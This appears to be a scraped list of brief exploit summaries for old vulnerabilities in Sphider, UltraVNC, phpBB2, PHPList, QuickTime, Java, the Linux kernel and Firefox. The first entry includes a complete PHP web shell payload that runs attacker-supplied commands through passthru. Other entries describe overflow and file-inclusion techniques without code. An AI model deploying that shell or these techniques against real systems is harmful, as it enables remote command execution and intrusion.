Sphider <= 1.3 is vulnerable to arbitrary remote inclusion. This exploit works with register_globals = On & allow_url_fopen = On. The exploit requires a code to be included in the remote location which is then used to execute the command. The code is as follows: <?php ob_clean();if (get_magic_quotes_gpc()){$_GET["cmd"]=stripslashes($_GET["cmd"]);}ini_set("max_execution_time",0);echo 56789;passthru($_GET["cmd"]);die;?>
A buffer overflow vulnerability exists in Ultr@VNC 1.0.1 Client. An attacker can send a specially crafted packet to the VNC server port (5900) to trigger a buffer overflow and execute arbitrary code on the target system. This vulnerability was discovered by Luigi Auriemma and a proof-of-concept was developed by Paul Haas at Redspin.com. The exploit was tested on Windows XP SP2 and launches calc.exe.
This exploit is based on user_sig_bbcode_uid bug and is used to execute arbitrary commands on the vulnerable phpBB2 application. It was tested on versions 2.0.12, 2.0.13 and 2.0.19.
A lack in the code of PHPList <= 2.10.2 allows an attacker to include arbitrary file from local resources when register_globals = On in php.ini.
This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR.
This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a 'launchjnlp' parameter, it will copy the contents of the 'docbase' parameter to a stack-buffer using the 'sprintf' function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address.
This exploit is a local denial of service vulnerability in the Linux Kernel 2.6.16.x. It creates multiple threads that consume all available memory, causing the system to crash. The exploit uses the setsid() system call to avoid being counted as one thread in the oom_killer().
Input passed to the 'rub' parameter in 'lire.php' isn't properly verified, before it is used to include remote files. Successful exploitation requires that 'register_globals' is enabled. Remote User can Upload jpg,jpeg,gif,bmp files without Identification.
This module exploits a buffer overflow in Apple QuickTime 7.6.6. When processing a malformed SMIL uri, a stack-based buffer overflow can occur when logging an error message.
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.
Services By CQR